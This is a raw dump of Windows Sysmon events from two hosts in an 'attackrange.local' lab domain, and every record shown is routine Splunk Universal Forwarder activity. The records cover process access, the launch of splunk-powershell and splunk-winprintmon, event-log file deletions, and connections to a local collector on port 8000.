07:51:03.269{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103623Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.269{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103622Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.269{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B267-615A-D101-00000000FC01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103621Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.269{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103620Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.269{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B267-615A-D101-00000000FC01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103619Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.270{58E9C193-B267-615A-D101-00000000FC01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103618Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:03.254{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3518CEA86CBF733797BE2BB4B47B4E52,SHA256=CAE2737A00442036822103DB9C870E4F8BC30FCAAFC5F35257491A9E4305F914,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103640Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:04.913{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2315A5A97C140966AB9F6FB6637FBF9E,SHA256=1B5619A9CBAE8DD80E8CBFF4CEB4139B57F825162B418CF6867B45896B966C2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081460Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:04.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBA9D2467D7369F4E3E2590B0EAE721C,SHA256=FBE6176458B0092386D9220E629D477094A942272CA1F1EC1843D09BEC67F0C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103639Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:04.506{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79A0D6C3DC25A18B7D2583C59FC09E65,SHA256=6F6C93C2375E4B2E98698D4BF6B7B5946CA49C982776C0ACF1DCE5794C1671FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103649Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:05.913{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D716783A93C7B02FDAE9390CF798A3B4,SHA256=563AC86CCE9629A7D66995874E123EF455063CB4824E851D6D231969BF06ECE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081461Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:05.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02EE219167F71EA9C3CF12B72BA95562,SHA256=05C0C5EA6151411FBB2232BC50B078F42266DD178F3466C0D26DAF34B40E3D47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103648Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:05.444{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B269-615A-D301-00000000FC01}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103647Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:05.444{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103646Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:05.444{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103645Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:05.444{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103644Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:05.444{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103643Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:05.444{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B269-615A-D301-00000000FC01}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103642Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:05.444{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B269-615A-D301-00000000FC01}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103641Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:05.445{58E9C193-B269-615A-D301-00000000FC01}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103651Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:06.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=156FB73CE969BFFF9132879FBC276FB0,SHA256=F4593BDDB20905D98E220E2FC3169CFC89204B0359A2CEF136103220DA18BCF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081462Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:06.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D521BB8790A9EC9379F514E288D6D2B,SHA256=A1AAD5DD6D5775460EE6E465E969F539E30F8FB2067788CF66AC6F17BBB6A677,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103650Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:06.663{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=682FA29F4B557C9F435FA709F5CE2248,SHA256=7F2E4320954587DF44F281C2D32834A52CC40CE8F3C8EB109BBD536D55FE2945,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103652Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:07.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8C8EFADC0EC49B5368104775A7CEE59,SHA256=B77D5D69A7A00B4D484EB17016EE52A8EB619C108983774D8868C3C97B5043B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081464Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:04.780{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50029-false10.0.1.12-8000- 23542300x800000000000000081463Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:07.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=328B550408C60CD576CE6ACCA6AD5422,SHA256=EAA2A837E17F8A1334041F3A42ED873DC03A49C0739542FBBBD21E61C3EBBAB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103653Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:08.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F3D49FDDB70028354207A407A95A847,SHA256=132FC81D17F3EFAFD3BC37F1647E9B8A7708E5CA721AB744E183113D5969C213,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081465Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:08.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20392BFDC2C5B4020436D444E7BD3BF6,SHA256=3688BBCF186571EFF453ECD2107B99828A582B70C5863690C8F66B28AC4788AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103654Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:09.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30E285900B0D7E8CB3BB61D05FC8576F,SHA256=C32C5AC1CB7DA7E288ED72CC72868866E1BE9F66B46F130F13BBD0A68FD82652,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081466Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:09.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A329CFA584469F67AE79C82A1E7A784D,SHA256=ED5A7FD3512331E8432445A45E08D3CFAC3DCF80FD345593407CA54F88307719,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103656Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:10.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B8A008E7530D2F71B62E655DE2E7547,SHA256=0021952B3B71E37FCB47389C0DE229EB5C84915D92E11BFB2B3C0E10BCC578FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081467Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:10.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF13119F046DA09BAE6B5960FF07585A,SHA256=F9ECA21294A0AD01EB25B60E145F345CDE30FC232C1CE3EE3A46738455B5E6C7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103655Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:08.272{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49531-false10.0.1.12-8000- 23542300x8000000000000000103657Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:11.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F78F85B9A59CAF9AF713E4113AC2A3A4,SHA256=9F396655083B4291269D238B1EDCAB69DBB9C8AC66DC91F820F80735C018A1C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081468Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:11.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EE4A599C6006F2BAF7A83BFB106ED4D,SHA256=3A14631EA607C1608813932C47232767918B3F6A9DE3D446F3EEE0C9C1A82255,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103658Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:12.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AA64C37866B9A93DEF45DE3CD6DB6B1,SHA256=E7D372D43074F8DE2ACE6ED0081AE90D4C43BFFFBAE15B3530D746CFF92FD086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081469Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:12.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90FBEDB53E7B943DEBB2941548A46A09,SHA256=3BD012A52239A9DC05A20763E840991FE7264D31E5289558F0328BEA5540909A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103659Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:13.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B482EEC1816DE7D670875205F1F8AACC,SHA256=F1AD887CDFFD481BF08FFAFAEE3B3F2C123BC50288674D93EE97385EFA6B4DC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081471Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:10.745{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50030-false10.0.1.12-8000- 23542300x800000000000000081470Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:13.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 